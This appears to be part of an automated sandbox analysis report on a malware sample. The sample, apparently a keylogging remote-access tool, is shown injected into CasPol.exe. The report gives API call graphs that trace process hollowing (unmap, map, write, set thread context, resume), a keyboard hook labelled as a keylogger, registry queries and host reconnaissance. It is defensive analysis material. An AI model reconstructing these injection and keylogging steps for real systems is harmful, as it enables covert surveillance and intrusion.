                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                • API String ID: 384173800-625181639
                                                                                                • Opcode ID: b0b2e61fc073e98d70dce9ef4f7eaaaad63808f39ef958059982ad015adeb2a9
                                                                                                • Instruction ID: 91c85bc0cfa8e625a7056272f5779649be84715ca0db9f9d819234a6a75bf275
                                                                                                • Opcode Fuzzy Hash: b0b2e61fc073e98d70dce9ef4f7eaaaad63808f39ef958059982ad015adeb2a9
                                                                                                • Instruction Fuzzy Hash: 4C31E2A0E8035C7ADB207BB69CC9F3B7E6DD9847953510427B54893190EB7DEC408EAE

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 449 41742b-417448 450 41744c-4174bf GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 449->450 451 4177b3 450->451 452 4174c5-4174cc 450->452 454 4177b5-4177bf 451->454 452->451 453 4174d2-4174d9 452->453 453->451 455 4174df-4174e1 453->455 455->451 456 4174e7-417513 call 436260 * 2 455->456 456->451 461 417519-417524 456->461 461->451 462 41752a-41755a CreateProcessW 461->462 463 417560-417588 VirtualAlloc Wow64GetThreadContext 462->463 464 4177ad GetLastError 462->464 465 417779-4177ab VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 463->465 466 41758e-4175ae ReadProcessMemory 463->466 464->451 465->451 466->465 467 4175b4-4175d4 NtCreateSection 466->467 467->465 468 4175da-4175e7 467->468 469 4175e9-4175f4 NtUnmapViewOfSection 468->469 470 4175fa-41761c NtMapViewOfSection 468->470 469->470 471 41765d-417684 GetCurrentProcess NtMapViewOfSection 470->471 472 41761e-41764c VirtualFree NtClose TerminateProcess 470->472 474 417777 471->474 475 41768a-41768c 471->475 472->451 473 417652-417658 472->473 473->450 474->465 476 417695-4176bc call 435ce0 475->476 477 41768e-417692 475->477 480 4176fc-417706 476->480 481 4176be-4176c8 476->481 477->476 483 417724-417728 480->483 484 417708-41770e 480->484 482 4176cc-4176ef call 435ce0 481->482 495 4176f1-4176f8 482->495 486 41772a-417746 WriteProcessMemory 483->486 487 41774c-417763 Wow64SetThreadContext 483->487 484->483 485 417710-417721 call 417837 484->485 485->483 486->465 490 417748 486->490 487->465 491 417765-417771 ResumeThread 487->491 490->487 491->465 494 417773-417775 491->494 494->454 495->480
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00417472
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00417475
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00417486
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00417489
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041749A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041749D
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004174AE
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004174B1
                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00417552
                                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041756A
                                                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00417580
                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004175A6
                                                                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004175CC
                                                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 004175F4
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00417614
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417626
                                                                                                • NtClose.NTDLL(?), ref: 00417630
                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041763A
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00417671
                                                                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 0041767C
                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041773E
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0041775B
                                                                                                • ResumeThread.KERNEL32(?), ref: 00417768
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417780
                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 0041778B
                                                                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 00417792
                                                                                                • NtClose.NTDLL(?), ref: 0041779C
                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004177A5
                                                                                                • GetLastError.KERNEL32 ref: 004177AD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                • API String ID: 3150337530-3035715614
                                                                                                • Opcode ID: ca58d074774f4cb3cec8caed2bdcc8ae3fb1cd477b48ba63cf2103ffe40dc484
                                                                                                • Instruction ID: 9d7e092ec3b05a7a521957261ed1896ff906ab06cfb84d00d3f911d9ff722cfe
                                                                                                • Opcode Fuzzy Hash: ca58d074774f4cb3cec8caed2bdcc8ae3fb1cd477b48ba63cf2103ffe40dc484
                                                                                                • Instruction Fuzzy Hash: C3A16D71508304AFD710DF65CD89B6B7BF8FB48345F00082EF699962A1DB75E884CB6A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1668 4099e4-4099fd 1669 409a63-409a73 GetMessageA 1668->1669 1670 4099ff-409a19 GetModuleHandleA SetWindowsHookExA 1668->1670 1671 409a75-409a8d TranslateMessage DispatchMessageA 1669->1671 1672 409a8f 1669->1672 1670->1669 1673 409a1b-409a61 GetLastError call 41af51 call 404c9e call 401f66 call 41a891 call 401eea 1670->1673 1671->1669 1671->1672 1674 409a91-409a96 1672->1674 1673->1674
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                  • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                Strings
                                                                                                • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                • String ID: Keylogger initialization failure: error
                                                                                                • API String ID: 3219506041-952744263
                                                                                                • Opcode ID: 5b6adf47e014ac93f3a3888416b4c9c677b6eeb774b32e2acb5cdb6bdca514c4
                                                                                                • Instruction ID: 916e88852ed13b3ab14e3660f0b3d121b0d8821096f38c6baae7fa71b0b7a026
                                                                                                • Opcode Fuzzy Hash: 5b6adf47e014ac93f3a3888416b4c9c677b6eeb774b32e2acb5cdb6bdca514c4
                                                                                                • Instruction Fuzzy Hash: 6D118271604301AFC710BB7A9C4996B77ECAB94B15B10057EFC45E2191EE34DA01CBAA

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1709 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1716 10001177-1000119e lstrlenW FindFirstFileW 1709->1716 1717 10001168-10001172 lstrlenW 1709->1717 1718 100011a0-100011a8 1716->1718 1719 100011e1-100011e9 1716->1719 1717->1716 1720 100011c7-100011d8 FindNextFileW 1718->1720 1721 100011aa-100011c4 call 10001000 1718->1721 1720->1718 1722 100011da-100011db FindClose 1720->1722 1721->1720 1722->1719
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 1083526818-0
                                                                                                • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                APIs
                                                                                                  • Part of subcall function 0041258F: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004125AF
                                                                                                  • Part of subcall function 0041258F: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00475308), ref: 004125CD
                                                                                                  • Part of subcall function 0041258F: RegCloseKey.KERNEL32(?), ref: 004125D8
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040E6DB
                                                                                                • ExitProcess.KERNEL32 ref: 0040E74A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                • String ID: 6.0.0 Pro$override$pth_unenc
                                                                                                • API String ID: 2281282204-4012039065
                                                                                                • Opcode ID: f421cdf6d9c6d8049a3e57c2dc73a36603adb0feb741279f5af10ed514b8101a
                                                                                                • Instruction ID: 41eca1b412dc6cb4cbd69e66e1420b1d2a9bda06de9f36a729d5cd10817e4b5d
                                                                                                • Opcode Fuzzy Hash: f421cdf6d9c6d8049a3e57c2dc73a36603adb0feb741279f5af10ed514b8101a
                                                                                                • Instruction Fuzzy Hash: A821D131F1420027D60876778857B6F399A9B81719F90052EF819A72E7EEBD9E1083DF
                                                                                                APIs
                                                                                                  • Part of subcall function 00410691: SetLastError.KERNEL32(0000000D,00410C10,?,00000000), ref: 00410697
                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410BED), ref: 00410C9C
                                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410D02
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410D09
                                                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410E17
                                                                                                • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410BED), ref: 00410E41
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                • String ID:
                                                                                                • API String ID: 3525466593-0
                                                                                                • Opcode ID: 5b761030cf84cfef50a77e8f1fc708b710696a941d42968a3fbf92de24ca1f36
                                                                                                • Instruction ID: e2f64966b18619331c3eea81ef564f6afd9e4387f8ea08f62d3b86939114ae32
                                                                                                • Opcode Fuzzy Hash: 5b761030cf84cfef50a77e8f1fc708b710696a941d42968a3fbf92de24ca1f36
                                                                                                • Instruction Fuzzy Hash: 8E61E570200305ABD710AF56C981BA77BA5BF84308F04451EF909CB382DBF8E8D5CB99
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(00000001,00474EE0,004755B0,00000000,?,?,?,?,?,00414F1C,?,00000001), ref: 00404946
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,004755B0,00000000,?,?,?,?,?,00414F1C,?,00000001), ref: 00404994
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                Strings
                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$EventLocalThreadTime
                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 2532271599-1507639952
                                                                                                • Opcode ID: 73f2bbfe3d7bc8febb2c1769107f2374a35e22cb7b8d5d704eeee78256e29123
                                                                                                • Instruction ID: 334fa9fd2124ebc6c4f40b6d461b17bc354faf393a4ed588a06a33f3771f6744
                                                                                                • Opcode Fuzzy Hash: 73f2bbfe3d7bc8febb2c1769107f2374a35e22cb7b8d5d704eeee78256e29123
                                                                                                • Instruction Fuzzy Hash: 1611E3B19052547ACB10A7BA8849BDB7F9CAB86364F00007FF50462292DA789845CBFA
                                                                                                APIs
                                                                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004328CD,00000024,?,?,?), ref: 00432B57
                                                                                                • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CDC9,?), ref: 00432B6D
                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CDC9,?), ref: 00432B7F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                • String ID:
                                                                                                • API String ID: 1815803762-0
                                                                                                • Opcode ID: 35a60dd61fd8b237ab80bed8c3b3b6d5f5cecafcaafe6d2ae27acd69f3d7963f
                                                                                                • Instruction ID: 69441ad90531868046e0b1178e1924530c202fcb63ed7aa5228c64bcbe668f15
                                                                                                • Opcode Fuzzy Hash: 35a60dd61fd8b237ab80bed8c3b3b6d5f5cecafcaafe6d2ae27acd69f3d7963f
                                                                                                • Instruction Fuzzy Hash: ADE09231608350FFFB300F25AC08F177B94EB89B65F21063AF155E40E4CAA59805961C
                                                                                                APIs
                                                                                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750FC), ref: 0041A9CA
                                                                                                • GetUserNameW.ADVAPI32(?,0040E096), ref: 0041A9E2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Name$ComputerUser
                                                                                                • String ID:
                                                                                                • API String ID: 4229901323-0
                                                                                                • Opcode ID: c38e36c8d41ee46761b6a4ad2d0e2b40601694a6c822a335d006f55048ef3fa5
                                                                                                • Instruction ID: dd4171341b6269d20eef4dfb17ad31a68228dcd82fcdc0eb213b330dd994abd5
                                                                                                • Opcode Fuzzy Hash: c38e36c8d41ee46761b6a4ad2d0e2b40601694a6c822a335d006f55048ef3fa5
                                                                                                • Instruction Fuzzy Hash: 16014F7290011CAADB00EB90DC49ADDBB7CEF44315F10016AB502B3195EFB4AB898A98
                                                                                                APIs
                                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004146BA,00474EE0,00475A38,00474EE0,00000000,00474EE0,?,00474EE0,6.0.0 Pro), ref: 0040E765
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: 421515283829ddc35b956787f58d423e39949e6c6887f96e861c6dca66fe8524
                                                                                                • Instruction ID: 426317967f55bc2b8d076a22fb2a8dcf1c85f3a8f112093483d3870effb55d88
                                                                                                • Opcode Fuzzy Hash: 421515283829ddc35b956787f58d423e39949e6c6887f96e861c6dca66fe8524
                                                                                                • Instruction Fuzzy Hash: A6D05E607002197BEA109691CC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF048AE1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 5 40d83a-40d8bc call 41beee GetModuleFileNameW call 40e240 call 401fbd * 2 call 41b1ce call 40e995 call 401d8c call 43ea30 22 40d908-40d9d0 call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d8be-40d903 call 40ea5e call 401d64 call 401e8f call 40fd92 call 40ea0f call 40e22d 5->23 69 40d9d2-40da1d call 4085b4 call 401eef call 401eea call 401e8f call 41258f 22->69 70 40da23-40da3e call 401d64 call 40b125 22->70 49 40dd69-40dd7a call 401eea 23->49 69->70 102 40e20c-40e22c call 401e8f call 4129da call 41138d 69->102 79 40da40-40da5f call 401e8f call 41258f 70->79 80 40da78-40da7f call 40bed7 70->80 79->80 98 40da61-40da77 call 401e8f call 4129da 79->98 88 40da81-40da83 80->88 89 40da88-40da8f 80->89 92 40dd68 88->92 93 40da91 89->93 94 40da93-40da9f call 41a66e 89->94 92->49 93->94 103 40daa1-40daa3 94->103 104 40daa8-40daac 94->104 98->80 103->104 108 40daeb-40dafe call 401d64 call 401e8f 104->108 109 40daae call 40697b 104->109 127 40db00 call 4069ba 108->127 128 40db05-40db8d call 401d64 call 41b013 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->128 118 40dab3-40dab5 109->118 121 40dac1-40dad4 call 401d64 call 401e8f 118->121 122 40dab7-40dabc call 40699d call 4064d0 118->122 121->108 138 40dad6-40dadc 121->138 122->121 127->128 163 40dbf5-40dbf9 128->163 164 40db8f-40dba8 call 401d64 call 401e8f call 43a821 128->164 138->108 140 40dade-40dae4 138->140 140->108 142 40dae6 call 4064d0 140->142 142->108 165 40dd7d-40ddd4 call 436260 call 4022f8 call 401e8f * 2 call 412735 call 4082d7 163->165 166 40dbff-40dc06 163->166 164->163 189 40dbaa-40dbf0 call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->189 220 40ddd9-40de2f call 401d64 call 401e8f call 401f66 call 401e8f call 4127aa call 401d64 call 401e8f call 43a7f7 165->220 168 40dc84-40dc8e call 4082d7 166->168 169 40dc08-40dc82 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->169 179 40dc93-40dcb7 call 4022f8 call 433ad3 168->179 169->179 196 40dcc6 179->196 197 40dcb9-40dcc4 call 436260 179->197 189->163 203 40dcc8-40dd13 call 401e07 call 43e559 call 4022f8 call 401e8f call 4022f8 call 401e8f call 41297a 196->203 197->203 257 40dd18-40dd3d call 433adc call 401d64 call 40b125 203->257 272 40de31 220->272 273 40de4c-40de4e 220->273 257->220 274 40dd43-40dd64 call 401d64 call 41b013 call 40e2f1 257->274 275 40de33-40de4a call 41c0bb CreateThread 272->275 276 40de50-40de52 273->276 277 40de54 273->277 274->220 292 40dd66 274->292 280 40de5a-40df39 call 401f66 * 2 call 41a891 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a7f7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->275 277->280 330 40df74 280->330 331 40df3b-40df72 call 433818 call 401d64 call 401e8f CreateThread 280->331 292->92 333 40df76-40df8e call 401d64 call 401e8f 330->333 331->333 342 40df90-40dfc7 call 433818 call 401d64 call 401e8f CreateThread 333->342 343 40dfcc-40dfdf call 401d64 call 401e8f 333->343 342->343 353 40dfe1-40e03a call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 343->353 354 40e03f-40e052 call 401d64 call 401e8f 343->354 353->354 365 40e054-40e088 call 401d64 call 401e8f call 401d64 call 401e8f call 43a7f7 call 40b95c 354->365 366 40e08d-40e0b1 call 41a9ad call 401e18 call 401e13 354->366 365->366 386 40e0b3-40e0b4 SetProcessDEPPolicy 366->386 387 40e0b6-40e0c9 CreateThread 366->387 386->387 390 40e0d7-40e0de 387->390 391 40e0cb-40e0d5 CreateThread 387->391 394 40e0e0-40e0ea CreateThread 390->394 395 40e0ec-40e0f3 390->395 391->390 394->395 398 40e0f5-40e0f8 395->398 399 40e106-40e10b 395->399 402 40e146-40e161 call 401e8f call 412546 398->402 403 40e0fa-40e104 398->403 401 40e110-40e141 call 401f66 call 404c9e call 401f66 call 41a891 call 401eea 399->401 401->402 414 40e167-40e1a7 call 41b013 call 401e07 call 41265c call 401e13 call 401e07 402->414 415 40e1fd-40e207 call 40cbac call 40cc37 call 4140ac 402->415 403->401 435 40e1c0-40e1c5 DeleteFileW 414->435 415->102 436 40e1c7-40e1f8 call 41b013 call 401e07 call 412a52 call 401e13 * 2 435->436 437 40e1a9-40e1ac 435->437 436->415 437->436 438 40e1ae-40e1bb Sleep call 401e07 437->438 438->435
                                                                                                APIs
                                                                                                  • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D856), ref: 0041BF03
                                                                                                  • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF0C
                                                                                                  • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D856), ref: 0041BF23
                                                                                                  • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF26
                                                                                                  • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D856), ref: 0041BF38
                                                                                                  • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF3B
                                                                                                  • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D856), ref: 0041BF4C
                                                                                                  • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF4F
                                                                                                  • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D856), ref: 0041BF60
                                                                                                  • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF63
                                                                                                  • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D856), ref: 0041BF70
                                                                                                  • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF73
                                                                                                  • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D856), ref: 0041BF80
                                                                                                  • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF83
                                                                                                  • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D856), ref: 0041BF90
                                                                                                  • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF93
                                                                                                  • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D856), ref: 0041BFA4
                                                                                                  • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFA7
                                                                                                  • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D856), ref: 0041BFB4
                                                                                                  • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFB7
                                                                                                  • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D856), ref: 0041BFC8
